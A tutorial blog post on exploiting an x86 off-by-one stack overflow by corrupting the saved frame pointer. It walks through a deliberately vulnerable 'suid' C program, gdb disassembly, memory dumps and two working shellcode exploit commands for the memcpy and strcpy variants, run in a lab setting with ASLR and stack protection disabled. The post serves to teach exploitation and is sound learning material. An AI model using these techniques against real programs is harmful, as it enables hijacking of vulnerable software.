After this deep trip into the heap overflow techniques (although there’s still much to see), it’s time to analyze again a particular stack overflow scenario: the so-called “off-by-one” scenario. What happens if the buffer we’re writing into can be overflowed by only one single byte? One of the first talk (if not the really first one) about this kind of scenario is in the Bugtraq mailing list: Olaf Kirch posted a message describing this vulnerability that he called “The poisoned NUL byte”. I will quote the core of his post:
At the beginning of the function, realpath copies the argument (1024 bytes) to a local buffer (sized MAXPATHLEN, i.e. 1024 bytes). Thus, the terminating 0 byte of the string gets scribbled over the next byte, which happens to be
the lowest byte of %ebp, the frame pointer of the calling function. At function entry, its value was 0xbffff3ec. After the strcpy, it becomes 0xbffff300.During the remainder of realpath(), nothing exciting happens, but when the function returns, %ebp is restored from stack, which effectively shifts down the calling function’s stack frame by 0xec bytes.
The whole vulnerability consisted into copy a string of X bytes into a buffer of exactly X bytes (and not X + 1). When writing the code somebody forgot that strcpy always adds to the destination buffer an additional NUL byte telling where the string ends. Of course, if the destination buffer’s size exactly matches the length of the string, the NUL byte will be written outside the buffer itself, overwriting potentially important data. Of course, if the buffer is close to the pushed EBP value, the latter’s LSB will be overwritten with a NUL byte.
Slightly more than a year later, a deeper analysis of the problem appeared on Phrack #55 in the article “The Frame Pointer overwrite” by klog. The vulnerable code he proposed is the following one (he ironically called it “suid“):
#include <stdio.h> #include <stdlib.h> #include <string.h> void func(char *sm) { char buffer[256]; memcpy(buffer, sm, 257); } int main(int argc, char *argv[]) { if (argc < 2) { printf("missing args\n"); exit(-1); } func(argv[1]); return 0; }
With a simple compilation
gcc -g -m32 -fno-stack-protector -z execstack -o suid suid.c
and a quick look to the dissassembled executable we can easily check out the situation:
$ gdb -q suid Reading symbols from suid...done. (gdb) disass func Dump of assembler code for function func: 0x08048525 <+0>: push ebp 0x08048526 <+1>: mov ebp,esp 0x08048528 <+3>: sub esp,0x118 0x0804852e <+9>: mov DWORD PTR [esp+0x8],0x101 0x08048536 <+17>: mov eax,DWORD PTR [ebp+0x8] 0x08048539 <+20>: mov DWORD PTR [esp+0x4],eax 0x0804853d <+24>: lea eax,[ebp-0x108] 0x08048543 <+30>: mov DWORD PTR [esp],eax 0x08048546 <+33>: call 0x80483f0 <memcpy@plt> 0x0804854b <+38>: leave 0x0804854c <+39>: ret End of assembler dump. (gdb)
The LEA instruction at 0x0804853D is somewhat suspicious: why letting buffer start at 0x108 bytes before the pushed EBP if buffer is actually 0x100 bytes long? Having this additional space would kill our goal! Well, the answer is, again, that GCC uses the 16-byte alignment for the stack and this is fixable by adding the -mpreferred-stack-boundary=2 parameter to the GCC’s command line:
gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -o suid suid.c
$ gdb -q suid Reading symbols from suid...done. (gdb) disass main Dump of assembler code for function main: 0x0804854d <+0>: push ebp 0x0804854e <+1>: mov ebp,esp 0x08048550 <+3>: sub esp,0x4 0x08048553 <+6>: cmp DWORD PTR [ebp+0x8],0x1 0x08048557 <+10>: jg 0x8048571 <main+36> 0x08048559 <+12>: mov DWORD PTR [esp],0x8048620 0x08048560 <+19>: call 0x8048400 <puts@plt> 0x08048565 <+24>: mov DWORD PTR [esp],0xffffffff 0x0804856c <+31>: call 0x8048410 <exit@plt> 0x08048571 <+36>: mov eax,DWORD PTR [ebp+0xc] 0x08048574 <+39>: add eax,0x4 0x08048577 <+42>: mov eax,DWORD PTR [eax] 0x08048579 <+44>: mov DWORD PTR [esp],eax 0x0804857c <+47>: call 0x8048525 0x08048581 <+52>: mov eax,0x0 0x08048586 <+57>: leave 0x08048587 <+58>: ret End of assembler dump. (gdb) disass func Dump of assembler code for function func: 0x08048525 <+0>: push ebp 0x08048526 <+1>: mov ebp,esp 0x08048528 <+3>: sub esp,0x118 0x0804852e <+9>: mov DWORD PTR [esp+0x8],0x101 0x08048536 <+17>: mov eax,DWORD PTR [ebp+0x8] 0x08048539 <+20>: mov DWORD PTR [esp+0x4],eax 0x0804853d <+24>: lea eax,[ebp-0x100] 0x08048543 <+30>: mov DWORD PTR [esp],eax 0x08048546 <+33>: call 0x80483f0 <memcpy@plt> 0x0804854b <+38>: leave 0x0804854c <+39>: ret End of assembler dump. (gdb)
Definitely better. So, the first instruction describes the layout that the stack is going to adopt:
STACK: ^ | | pushed EIP | pushed EBP | buffer[255] | buffer[254] | ... | buffer[0] |
So, as expected, the exceeding byte will overwrite the LSB of the EBP pushed value. What are the consequences of this? How can an EBP, changed from 0x11223344 to 0x112233XX, be exploited? In order to understand this, a little bit of study is required. Right before func returns, at 0x0804854B, the pushed (and changed) value of EBP is restored into the register and the function returns; the real deal comes when main returns as well, as the LEAVE instruction at 0x08048586 will copy EBP to ESP and pop EBP from the stack. At the end of the execution of this instruction, ESP will be set to 0x112233XX + 4 (because of the popping).
This whole thing is easily verifiable:
$ gdb -q suid Reading symbols from suid...done. (gdb) b *0x08048587 Breakpoint 1 at 0x8048587 (gdb) b *0x0804854C Breakpoint 2 at 0x804854c (gdb) r `python -c 'import sys; sys.stdout.write("A" * 257)'` Breakpoint 2, 0x0804854c in func () (gdb) i r ebp ebp 0xffffcd41 0xffffcd41 (gdb) c Continuing. Breakpoint 1, 0x08048587 in main () (gdb) i r esp esp 0xffffcd45 0xffffcd45
ESP got “damaged” and, right before returning from main, is set to 0xFFFFCD45. Even if we’re not able to overwrite the return address, as it’s possible to set ESP to a partially arbitrary value, then we can fool the CPU around and making it believe that the return address is somewhere else, inside our buffer variable.
The next step is to make it pointing to the right position in buffer and to fill the latter with a valid shellcode. This is how buffer‘s layout will look like:
NOPs
Shellcode
New return address
Overflowing byte
So, for the first two elements, there’s not much about to say… Just a bunch of NOP instructions and the usual shellcode will fit. The new return address will match, of course, buffer‘s address (in my case 0xFFFFCD1C); about the overflowing byte, it must computed in order to let the CPU think that the returning address is the one we set into buffer. On my computer, right after the memcpy, buffer looks like this:
(gdb) x/65x 0xFFFFCD1C 0xffffcd1c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd2c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd3c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd4c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd5c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd6c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd7c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd8c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd9c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcdac: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcdbc: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcdcc: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcddc: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcdec: 0x90909090 0x90909090 0xc03117eb 0xc931db31 0xffffcdfc: 0x04b0d231 0xb25901b3 0xb080cd06 0xcddb3101 0xffffce0c: 0xffe4e880 0x7750ffff 0x2164656e 0xffffcd1c 0xffffce1c: 0xffffceXX EBP -> 0xFFFFCE1C
In order to have the CPU tricked in the proper way, in 0xFFFFCE1C we must be set to 0xFFFFCE14: this means that 0x14 is the overflowing byte.
Well, everything’s ready. Let’s try this one out:
$ ./suid `python -c 'import sys; sys.stdout.write("\x90" * (252-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21" + "\x1c\xcd\xff\xff" + "\x14")'` Pwned!$
Yah-wee!!!! It works!
But it’s not over yet. What if we’re not able to control the overflowing byte? What if, instead of memcpy, we had a wrongly-used strcpy (which is more similar to Kirch’s scenario)?
So, the code changes in the following way:
void func(char *sm) { char buffer[256]; if(strlen(sm) <= 256) strcpy(buffer, sm); }
strcpy will copy sm into buffer, but will add a NUL character outside the boundaries. So, our overflowing byte will be 0x00, without any chance of modifying it. Not a big deal: we just need to rearrange the content of buffer.
We know that stored EBP value will be corrupted to be 0xFFFFCE00 (because of the NUL character): this means that the returning address must be stored 4 bytes away from there, at 0xFFFFCE04. buffer will look like this:
NOPs
Shellcode
NOPs
New return address
NOPs
(gdb) x/65x 0xFFFFCD1C 0xffffcd1c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd2c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd3c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd4c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd5c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd6c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd7c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd8c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcd9c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcdac: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcdbc: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcdcc: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffcddc: 0x90909090 0xc03117eb 0xc931db31 0x04b0d231 0xffffcdec: 0xb25901b3 0xb080cd06 0xcddb3101 0xffe4e880 0xffffcdfc: 0x7750ffff 0x2164656e 0xffffcd1c 0x90909090 0xffffce0c: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffce1c: 0xffffce00
(NOPs… NOPs everywhere)
Running this one will work:
$ ./suid `python -c 'import sys; sys.stdout.write("\x90" * (232-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21" + "\x1c\xcd\xff\xff" + "\x90" * 20)'` Pwned!$
During the whole testing, I had, again, to disable the ASLR system. In conclusion, even a one-byte overflow is enough to change the original behaviour of an application and to subvert it to our will. There’s never peace for these guys…
One thought on “x86 Exploitation 101: “Off-by-one” and an uninvited friend joins the party”